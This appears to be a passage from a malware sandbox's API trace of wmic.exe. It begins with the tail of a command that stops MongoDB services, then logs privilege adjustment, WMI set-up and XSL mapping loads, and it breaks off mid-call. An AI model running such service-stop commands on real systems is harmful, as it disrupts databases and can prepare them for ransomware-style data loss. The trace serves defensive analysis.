'%%MongoDB%%'\" call stopservice" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 303 os_tid = 0xbdc [0304.617] GetModuleHandleA (lpModuleName=0x0) returned 0xa20000 [0304.617] __set_app_type (_Type=0x1) [0304.617] __p__fmode () returned 0x776f3c14 [0304.617] __p__commode () returned 0x776f49ec [0304.617] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa59af0) returned 0x0 [0304.617] __wgetmainargs (in: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0, _DoWildCard=0, _StartInfo=0xa681bc | out: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0) returned 0 [0304.618] ??0CHString@@QAE@XZ () returned 0xa685ec [0304.618] malloc (_Size=0x18) returned 0x970ee0 [0304.618] malloc (_Size=0x38) returned 0x970f00 [0304.618] malloc (_Size=0x28) returned 0x970f40 [0304.618] malloc (_Size=0x18) returned 0x970f70 [0304.618] malloc (_Size=0x24) returned 0x970f90 [0304.618] malloc (_Size=0x18) returned 0x970fc0 [0304.618] malloc (_Size=0x18) returned 0x970fe0 [0304.619] ??0CHString@@QAE@XZ () returned 0xa688fc [0304.619] malloc (_Size=0x18) returned 0x971000 [0304.619] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0304.619] SetConsoleCtrlHandler (HandlerRoutine=0xa53cc0, Add=1) returned 1 [0304.619] _onexit (_Func=0xa5f370) returned 0xa5f370 [0304.619] _onexit (_Func=0xa5f380) returned 0xa5f380 [0304.619] _onexit (_Func=0xa5f390) returned 0xa5f390 [0304.619] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0304.620] ResolveDelayLoadedAPI () returned 0x74a22590 [0304.620] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0304.627] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0304.638] CoCreateInstance (in: rclsid=0xa26a74*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26a84*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xa68510 | out: ppv=0xa68510*=0x6c48b8) returned 0x0 [0304.664] GetCurrentProcess () returned 0xffffffff [0304.664] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x47fd1c | out: TokenHandle=0x47fd1c*=0x194) returned 1 [0304.664] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x47fd18 | out: TokenInformation=0x0, ReturnLength=0x47fd18) returned 0 [0304.665] malloc (_Size=0x118) returned 0x9726b0 [0304.665] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x9726b0, TokenInformationLength=0x118, ReturnLength=0x47fd18 | out: TokenInformation=0x9726b0, ReturnLength=0x47fd18) returned 1 [0304.665] AdjustTokenPrivileges (in: TokenHandle=0x194, DisableAllPrivileges=0, NewState=0x9726b0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0304.665] free (_Block=0x9726b0) [0304.665] CloseHandle (hObject=0x194) returned 1 [0304.665] malloc (_Size=0x40) returned 0x9726b0 [0304.665] malloc (_Size=0x40) returned 0x9726f8 [0304.665] malloc (_Size=0x40) returned 0x972740 [0304.665] SetThreadUILanguage (LangId=0x0) returned 0x200409 [0304.669] _vsnwprintf (in: _Buffer=0x972740, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x47fca4 | out: _Buffer="ms_409") returned 6 [0304.669] malloc (_Size=0x20) returned 0x9711f8 [0304.669] GetComputerNameW (in: lpBuffer=0x9711f8, nSize=0x47fd08 | out: lpBuffer="NQDPDE", nSize=0x47fd08) returned 1 [0304.670] lstrlenW (lpString="NQDPDE") returned 6 [0304.670] malloc (_Size=0xe) returned 0x972788 [0304.670] lstrlenW (lpString="NQDPDE") returned 6 [0304.670] ResolveDelayLoadedAPI () returned 0x7444db00 [0304.670] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x47fd1c | out: lpNameBuffer=0x0, nSize=0x47fd1c) returned 0x203000 [0304.672] GetLastError () returned 0xea [0304.672] malloc (_Size=0x1e) returned 0x9727a0 [0304.672] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x9727a0, nSize=0x47fd1c | out: lpNameBuffer="NQDPDE\\FD1HVy", nSize=0x47fd1c) returned 0x1 [0304.672] lstrlenW (lpString="") returned 0 [0304.672] lstrlenW (lpString="NQDPDE") returned 6 [0304.672] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0304.674] lstrlenW (lpString=".") returned 1 [0304.674] lstrlenW (lpString="NQDPDE") returned 6 [0304.674] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2=".", cchCount2=1) returned 3 [0304.674] lstrlenW (lpString="LOCALHOST") returned 9 [0304.674] lstrlenW (lpString="NQDPDE") returned 6 [0304.674] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="LOCALHOST", cchCount2=9) returned 3 [0304.674] lstrlenW (lpString="NQDPDE") returned 6 [0304.674] lstrlenW (lpString="NQDPDE") returned 6 [0304.674] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="NQDPDE", cchCount2=6) returned 2 [0304.674] free (_Block=0x972788) [0304.674] lstrlenW (lpString="NQDPDE") returned 6 [0304.674] malloc (_Size=0xe) returned 0x972788 [0304.674] lstrlenW (lpString="NQDPDE") returned 6 [0304.674] lstrlenW (lpString="NQDPDE") returned 6 [0304.675] malloc (_Size=0xe) returned 0x9727c8 [0304.675] lstrlenW (lpString="NQDPDE") returned 6 [0304.675] malloc (_Size=0x4) returned 0x9727e0 [0304.675] malloc (_Size=0xc) returned 0x9727f0 [0304.675] ResolveDelayLoadedAPI () returned 0x7745b870 [0304.686] malloc (_Size=0x18) returned 0x972808 [0304.686] malloc (_Size=0xc) returned 0x972828 [0304.686] SysStringLen (param_1="IDENTIFY") returned 0x8 [0304.686] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0304.686] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0304.686] SysStringLen (param_1="IDENTIFY") returned 0x8 [0304.686] malloc (_Size=0x18) returned 0x972840 [0304.686] malloc (_Size=0xc) returned 0x972860 [0304.686] SysStringLen (param_1="IMPERSONATE") returned 0xb [0304.686] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0304.686] SysStringLen (param_1="IMPERSONATE") returned 0xb [0304.686] SysStringLen (param_1="IDENTIFY") returned 0x8 [0304.686] SysStringLen (param_1="IDENTIFY") returned 0x8 [0304.686] SysStringLen (param_1="IMPERSONATE") returned 0xb [0304.686] malloc (_Size=0x18) returned 0x972878 [0304.686] malloc (_Size=0xc) returned 0x972898 [0304.686] SysStringLen (param_1="DELEGATE") returned 0x8 [0304.686] SysStringLen (param_1="IDENTIFY") returned 0x8 [0304.686] SysStringLen (param_1="DELEGATE") returned 0x8 [0304.686] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0304.686] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0304.686] SysStringLen (param_1="DELEGATE") returned 0x8 [0304.687] malloc (_Size=0x18) returned 0x9728b0 [0304.687] malloc (_Size=0xc) returned 0x9728d0 [0304.687] malloc (_Size=0x18) returned 0x9728e8 [0304.687] malloc (_Size=0xc) returned 0x972908 [0304.687] SysStringLen (param_1="NONE") returned 0x4 [0304.687] SysStringLen (param_1="DEFAULT") returned 0x7 [0304.687] SysStringLen (param_1="DEFAULT") returned 0x7 [0304.687] SysStringLen (param_1="NONE") returned 0x4 [0304.687] malloc (_Size=0x18) returned 0x972920 [0304.687] malloc (_Size=0xc) returned 0x972940 [0304.687] SysStringLen (param_1="CONNECT") returned 0x7 [0304.687] SysStringLen (param_1="DEFAULT") returned 0x7 [0304.687] malloc (_Size=0x18) returned 0x972958 [0304.687] malloc (_Size=0xc) returned 0x9704a0 [0304.688] SysStringLen (param_1="CALL") returned 0x4 [0304.688] SysStringLen (param_1="DEFAULT") returned 0x7 [0304.688] SysStringLen (param_1="CALL") returned 0x4 [0304.688] SysStringLen (param_1="CONNECT") returned 0x7 [0304.688] malloc (_Size=0x18) returned 0x9704b8 [0304.688] malloc (_Size=0xc) returned 0x9704d8 [0304.688] SysStringLen (param_1="PKT") returned 0x3 [0304.688] SysStringLen (param_1="DEFAULT") returned 0x7 [0304.688] SysStringLen (param_1="PKT") returned 0x3 [0304.688] SysStringLen (param_1="NONE") returned 0x4 [0304.688] SysStringLen (param_1="NONE") returned 0x4 [0304.688] SysStringLen (param_1="PKT") returned 0x3 [0304.688] malloc (_Size=0x18) returned 0x9729c0 [0304.688] malloc (_Size=0xc) returned 0x9704f0 [0304.688] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0304.688] SysStringLen (param_1="DEFAULT") returned 0x7 [0304.688] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0304.688] SysStringLen (param_1="NONE") returned 0x4 [0304.688] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0304.688] SysStringLen (param_1="PKT") returned 0x3 [0304.688] SysStringLen (param_1="PKT") returned 0x3 [0304.688] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0304.689] malloc (_Size=0x18) returned 0x972ac0 [0304.689] malloc (_Size=0xc) returned 0x970508 [0304.689] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0304.689] SysStringLen (param_1="DEFAULT") returned 0x7 [0304.689] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0304.689] SysStringLen (param_1="PKT") returned 0x3 [0304.689] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0304.689] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0304.689] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0304.689] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0304.689] malloc (_Size=0x18) returned 0x972a60 [0304.689] malloc (_Size=0x40) returned 0x970520 [0304.689] malloc (_Size=0x20a) returned 0x9797c8 [0304.689] GetSystemDirectoryW (in: lpBuffer=0x9797c8, uSize=0x105 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0304.689] free (_Block=0x9797c8) [0304.689] malloc (_Size=0xc) returned 0x970568 [0304.689] malloc (_Size=0xc) returned 0x970580 [0304.689] malloc (_Size=0xc) returned 0x972d80 [0304.689] SysStringLen (param_1="C:\\WINDOWS\\system32") returned 0x13 [0304.689] SysStringLen (param_1="\\wbem\\") returned 0x6 [0304.690] free (_Block=0x970568) [0304.690] free (_Block=0x970580) [0304.690] SysStringByteLen (bstr="C:\\WINDOWS\\system32\\wbem\\") returned 0x32 [0304.690] free (_Block=0x972d80) [0304.690] malloc (_Size=0xc) returned 0x9799a0 [0304.690] malloc (_Size=0xc) returned 0x979970 [0304.690] malloc (_Size=0xc) returned 0x9799b8 [0304.690] SysStringLen (param_1="C:\\WINDOWS\\system32\\wbem\\") returned 0x19 [0304.690] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0304.690] free (_Block=0x9799a0) [0304.690] free (_Block=0x979970) [0304.690] GetCurrentThreadId () returned 0xbdc [0304.690] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x47f82c | out: phkResult=0x47f82c*=0x1a0) returned 0x0 [0304.691] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x47f838, lpcbData=0x47f834*=0x400 | out: lpType=0x0, lpData=0x47f838*=0x30, lpcbData=0x47f834*=0x4) returned 0x0 [0304.691] _wcsicmp (_String1="0", _String2="1") returned -1 [0304.691] _wcsicmp (_String1="0", _String2="2") returned -2 [0304.691] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x47f834*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x47f834*=0x42) returned 0x0 [0304.691] malloc (_Size=0x86) returned 0x972d80 [0304.691] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x972d80, lpcbData=0x47f834*=0x42 | out: lpType=0x0, lpData=0x972d80*=0x25, lpcbData=0x47f834*=0x42) returned 0x0 [0304.691] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0304.691] malloc (_Size=0x42) returned 0x972e10 [0304.691] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0304.691] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x47f838, lpcbData=0x47f834*=0x400 | out: lpType=0x0, lpData=0x47f838*=0x36, lpcbData=0x47f834*=0xc) returned 0x0 [0304.691] _wtol (_String="65536") returned 65536 [0304.691] free (_Block=0x972d80) [0304.691] RegCloseKey (hKey=0x0) returned 0x6 [0304.691] CoCreateInstance (in: rclsid=0xa26ad4*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26ae4*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x47fcc8 | out: ppv=0x47fcc8*=0x8645a8) returned 0x0 [0304.772] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x8645a8, xmlSource=0x47fc4c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\WINDOWS\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x47fcb4 | out: isSuccessful=0x47fcb4*=0xffff) returned 0x0 [0304.932] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x8645a8, DOMElement=0x47fcc4 | out: DOMElement=0x47fcc4*=0x866b48) returned 0x0 [0304.933] malloc (_Size=0xc) returned 0x9797f0 [0304.933] IXMLDOMElement:getElementsByTagName (in: This=0x866b48, tagName="XSLFORMAT", resultList=0x47fcc0 | out: resultList=0x47fcc0*=0x869ca0) returned 0x0 [0304.935] free (_Block=0x9797f0) [0304.935] IXMLDOMNodeList:get_length (in: This=0x869ca0, listLength=0x47fcbc | out: listLength=0x47fcbc*=21) returned 0x0 [0304.935] IXMLDOMNodeList:get_item (in: This=0x869ca0, index=0, listItem=0x47fcdc | out: listItem=0x47fcdc*=0x866b88) returned 0x0 [0304.936] IXMLDOMNode:get_text (in: This=0x866b88, text=0x47fce0 | out: text=0x47fce0*="texttable.xsl") returned 0x0 [0304.936] IXMLDOMNode:get_attributes (in: This=0x866b88, attributeMap=0x47fcd8 | out: attributeMap=0x47fcd8*=0x869fa8) returned 0x0 [0304.936] malloc (_Size=0xc) returned 0x979910 [0304.937] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x869fa8, name="KEYWORD", namedItem=0x47fcd4 | out: namedItem=0x47fcd4*=0x869ff8) returned 0x0 [0304.937] free (_Block=0x979910) [0304.937] IXMLDOMNode:get_nodeValue (in: This=0x869ff8, value=0x47fc94 | out: value=0x47fc94*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x0)) returned 0x0 [0304.937] malloc (_Size=0xc) returned 0x979820 [0304.937] malloc (_Size=0xc) returned 0x979838 [0304.937] malloc (_Size=0x18) returned 0x972ba0 [0304.937] IUnknown:Release (This=0x866b88) returned 0x0 [0304.937] IUnknown:Release (This=0x869fa8) returned 0x0 [0304.937] IUnknown:Release (This=0x869ff8) returned 0x0 [0304.937] IXMLDOMNodeList:get_item (in: This=0x869ca0, index=1, listItem=0x47fcdc | out: listItem=0x47fcdc*=0x866b88) returned 0x0 [0304.938] IXMLDOMNode:get_text (in: This=0x866b88, text=0x47fce0 | out: text=0x47fce0*="textvaluelist.xsl") returned 0x0 [0304.938] IXMLDOMNode:get_attributes (in: This=0x866b88, attributeMap=0x47fcd8 | out: attributeMap=0x47fcd8*=0x869fa8) returned 0x0 [0304.938] malloc (_Size=0xc) returned 0x9798c8 [0304.938] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x869fa8, name="KEYWORD", namedItem=0x47fcd4 | out: namedItem=0x47fcd4*=0x869ff8) returned 0x0 [0304.938] free (_Block=0x9798c8) [0304.938] IXMLDOMNode:get_nodeValue (in: This=0x869ff8, value=0x47fc94 | out: value=0x47fc94*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x0)) returned 0x0 [0304.938] malloc (_Size=0xc) returned 0x979808 [0304.938] malloc (_Size=0xc) returned 0x9799a0 [0304.938] SysStringLen (param_1="VALUE") returned 0x5 [0304.938] SysStringLen (param_1="TABLE") returned 0x5 [0304.938] SysStringLen (param_1="TABLE") returned 0x5 [0304.938] SysStringLen (param_1="VALUE") returned 0x5 [0304.938] malloc (_Size=0x18) returned 0x972bc0 [0304.938] IUnknown:Release (This=0x866b88) returned 0x0 [0304.939] IUnknown:Release (This=0x869fa8) returned 0x0 [0304.939] IUnknown:Release (This=0x869ff8) returned 0x0 [0304.939] IXMLDOMNodeList:get_item (in: This=0x869ca0, index=2, listItem=0x47fcdc | out: listItem=0x47fcdc*=0x866b88) returned 0x0 [0304.939] IXMLDOMNode:get_text (in: This=0x866b88, text=0x47fce0 | out: text=0x47fce0*="textvaluelist.xsl") returned 0x0 [0304.939] IXMLDOMNode:get_attributes (in: This=0x866b88, attributeMap=0x47fcd8 | out: attributeMap=0x47fcd8*=0x869fa8) returned 0x0 [0304.939] malloc (_Size=0xc) returned 0x979898 [0304.939] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x869fa8, name="KEYWORD", namedItem=0x47fcd4 | out: namedItem=0x47fcd4*=0x869ff8) returned 0x0 [0304.939] free (_Block=0x979898) [0304.939] IXMLDOMNode:get_nodeValue (in: This=0x869ff8, value=0x47fc94 | out: value=0x47fc94*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x0)) returned 0x0 [0304.939] malloc (_Size=0xc) returned 0x979940 [0304.939] malloc (_Size=0xc) returned 0x979970 [0304.940] SysStringLen (param_1="LIST") returned 0x4 [0304.940] SysStringLen (param_1="TABLE") returned 0x5 [0304.940] malloc (_Size=0x18) returned 0x972b60 [0304.940] IUnknown:Release (This=0x866b88) returned 0x0 [0304.940] IUnknown:Release (This=0x869fa8) returned 0x0 [0304.940] IUnknown:Release (This=0x869ff8) returned 0x0 [0304.940] IXMLDOMNodeList:get_item (in: This=0x869ca0, index=3, listItem=0x47fcdc | out: listItem=0x47fcdc*=0x866b88) returned 0x0 [0304.940] IXMLDOMNode:get_text (in: This=0x866b88, text=0x47fce0 | out: text=0x47fce0*="rawxml.xsl") returned 0x0 [0304.940] IXMLDOMNode:get_attributes (in: This=0x866b88, attributeMap=0x47fcd8 | out: attributeMap=0x47fcd8*=0x869fa8) returned 0x0 [0304.940] malloc (_Size=0xc) returned 0x979850 [0304.940] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x869fa8, name="KEYWORD", namedItem=0x47fcd4 | out: namedItem=0x47fcd4*=0x869ff8) returned 0x0 [0304.940] free (_Block=0x979850) [0304.941] IXMLDOMNode:get_nodeValue (in: This=0x869ff8, value=0x47fc94 | out: value=0x47fc94*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x0)) returned 0x0 [0304.941] malloc (_Size=0xc) returned 0x979910 [0304.941] malloc (_Size=0xc) returned 0x9798e0 [0304.941] SysStringLen (param_1="RAWXML") returned 0x6 [0304.941] SysStringLen (param_1="TABLE") returned 0x5 [0304.941] SysStringLen (param_1="RAWXML") returned 0x6 [0304.941] SysStringLen (param_1="LIST") returned 0x4 [0304.941] SysStringLen (param_1="LIST") returned 0x4 [0304.941] SysStringLen (param_1="RAWXML") returned 0x6 [0304.941] malloc (_Size=0x18) returned 0x972aa0 [0304.941] IUnknown:Release (This=0x866b88) returned 0x0 [0304.941] IUnknown:Release (This=0x869fa8) returned 0x0 [0304.941] IUnknown:Release (This=0x869ff8) returned 0x0 [0304.941] IXMLDOMNodeList:get_item (in: This=0x869ca0, index=4, listItem=0x47fcdc | out: listItem=0x47fcdc*=0x866b88) returned 0x0 [0304.941] IXMLDOMNode:get_text (in: This=0x866b88, text=0x47fce0 | out: text=0x47fce0*="htable.xsl") returned 0x0 [0304.941] IXMLDOMNode:get_attributes (in: This=0x866b88, attributeMap=0x47fcd8 | out: attributeMap=0x47fcd8*=0x869fa8) returned 0x0 [0304.941] malloc (_Size=0xc) returned 0x979988 [0304.942] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x869fa8, name="KEYWORD", namedItem=0x47fcd4 | out: namedItem=0x47fcd4*=0x869ff8) returned 0x0 [0304.942] free (_Block=0x979988) [0304.942] IXMLDOMNode:get_nodeValue (in: This=0x869ff8, value=0x47fc94 | out: value=0x47fc94*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x0)) returned 0x0 [0304.942] malloc (_Size=0xc) returned 0x979928 [0304.942] malloc (_Size=0xc) returned 0x979988 [0304.942] SysStringLen (param_1="HTABLE") returned 0x6 [0304.942] SysStringLen (param_1="TABLE") returned 0x5 [0304.942] SysStringLen (param_1="HTABLE") returned 0x6 [0304.942] SysStringLen (param_1="LIST") returned 0x4 [0304.942] malloc (_Size=0x18) returned 0x972c00 [0304.942] IUnknown:Release (This=0x866b88) returned 0x0 [0304.942] IUnknown:Release (This=0x869fa8) returned 0x0 [0304.942] IUnknown:Release (This=0x869ff8) returned 0x0 [0304.942] IXMLDOMNodeList:get_item (in: This=0x869ca0, index=5, listItem=0x47fcdc | out: listItem=0x47fcdc*=0x866b88) returned 0x0 [0304.943] IXMLDOMNode:get_text (in: This=0x866b88, text=0x47fce0 | out: text=0x47fce0*="hform.xsl") returned 0x0 [0304.943] IXMLDOMNode:get_attributes (in: This=0x866b88, attributeMap=0x47fcd8 | out: attributeMap=0x47fcd8*=0x869fa8) returned 0x0 [0304.943] malloc (_Size=0xc) returned 0x979958 [0304.943] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x869fa8, name="KEYWORD", namedItem=0x47fcd4 | out: namedItem=0x47fcd4*=0x869ff8) returned 0x0 [0304.943] free (_Block=0x979958) [0304.943] IXMLDOMNode:get_nodeValue (in: This=0x869ff8, value=0x47fc94 | out: value=0x47fc94*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x0)) returned 0x0 [0304.943] malloc (_Size=0xc) returned 0x9798f8 [0304.943] malloc (_Size=0xc) returned 0x9797f0 [0304.943] SysStringLen (param_1="HFORM") returned 0x5 [0304.943] SysStringLen (param_1="TABLE") returned 0x5 [0304.943] SysStringLen (param_1="HFORM") returned 0x5 [0304.943] SysStringLen (param_1="LIST") returned 0x4 [0304.943] SysStringLen (param_1="HFORM") returned 0x5 [0304.943] SysStringLen (param_1="HTABLE") returned 0x6 [0304.943] malloc (_Size=0x18) returned 0x972a80 [0304.944] IUnknown:Release (This=0x866b88) returned 0x0 [0304.944] IUnknown:Release (This=0x869fa8) returned 0x0 [0304.944] IUnknown:Release (This=0x869ff8) returned 0x0 [0304.944] IXMLDOMNodeList:get_item (in: This=0x869ca0, index=6, listItem=0x47fcdc | out: listItem=0x47fcdc*=0x866b88) returned 0x0 [0304.944] IXMLDOMNode:get_text (in: This=0x866b88, text=0x47fce0 | out: text=0x47fce0*="xml.xsl") returned 0x0 [0304.944] IXMLDOMNode:get_attributes (in: This=0x866b88, attributeMap=0x47fcd8 | out: attributeMap=0x47fcd8*=0x869fa8) returned 0x0 [0304.944] malloc (_Size=0xc) returned 0x979850 [0304.944] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x869fa8, name="KEYWORD", namedItem=0x47fcd4 | out: namedItem=0x47fcd4*=0x869ff8) returned 0x0 [0304.944] free (_Block=0x979850) [0304.944] IXMLDOMNode:get_nodeValue (in: This=0x869ff8, value=0x47fc94 | out: value=0x47fc94*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x0)) returned 0x0 [0304.944] malloc (_Size=0xc) returned 0x979850 [0304.945] malloc (_Size=0xc) returned 0x979958 [0304.945] SysStringLen (param_1="XML") returned 0x3 [0304.945] SysStringLen (param_1="TABLE") returned 0x5 [0304.945] SysStringLen (param_1="XML") returned 0x3 [0304.945] SysStringLen (param_1="VALUE") returned 0x5 [0304.945] SysStringLen (param_1="VALUE") returned 0x5 [0304.945] SysStringLen (param_1="XML") returned 0x3 [0304.945] malloc (_Size=0x18) returned 0x972be0 [0304.945] IUnknown:Release (This=0x866b88) returned 0x0 [0304.945] IUnknown:Release (This=0x869fa8) returned 0x0 [0304.945] IUnknown:Release (This=0x869ff8) returned 0x0 [0304.945] IXMLDOMNodeList:get_item (in: This=0x869ca0, index=7, listItem=0x47fcdc | out: listItem=0x47fcdc*=0x866b88) returned 0x0 [0304.945] IXMLDOMNode:get_text (in: This=0x866b88, text=0x47fce0 | out: text=0x47fce0*="mof.xsl") returned 0x0 [0304.945] IXMLDOMNode:get_attributes (in: This=0x866b88, attributeMap=0x47fcd8 | out: attributeMap=0x47fcd8*=0x869fa8) returned 0x0 [0304.945] malloc (_Size=0xc) returned 0x979868 [0304.945] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x869fa8, name="KEYWORD", namedItem=0x47fcd4 | out: namedItem=0x47fcd4*=0x869ff8) returned 0x0 [0304.946] free (_Block=0x979868) [0304.946] IXMLDOMNode:get_nodeValue (in: This=0x869ff8, value=0x47fc94 | out: value=0x47fc94*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x0)) returned 0x0 [0304.946] malloc (_Size=0xc) returned 0x979868 [0304.946] malloc (_Size=0xc) returned 0x979880 [0304.946] SysStringLen (param_1="MOF") returned 0x3 [0304.946] SysStringLen (param_1="TABLE") returned 0x5 [0304.946] SysStringLen (param_1="MOF") returned 0x3 [0304.946] SysStringLen (param_1="LIST") returned 0x4 [0304.946] SysStringLen (param_1="MOF") returned 0x3 [0304.946] SysStringLen (param_1="RAWXML") returned 0x6 [0304.946] SysStringLen 